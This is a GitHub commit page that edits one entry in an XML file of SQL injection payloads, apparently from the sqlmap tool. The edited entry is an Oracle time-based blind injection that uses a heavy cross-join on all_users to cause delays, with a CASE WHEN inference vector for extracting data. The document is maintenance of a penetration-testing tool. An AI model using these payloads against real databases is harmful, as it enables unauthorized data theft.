Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 7c32db6

Browse files
committed
Forgot when merged with my last commit
1 parent acac0d3 commit 7c32db6

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

xml/payloads.xml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1524,7 +1524,7 @@ Formats:
15241524
<where>1</where>
15251525
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
15261526
<request>
1527-
<payload>AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
1527+
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
15281528
</request>
15291529
<response>
15301530
<time>[DELAYED]</time>

0 commit comments

Comments
 (0)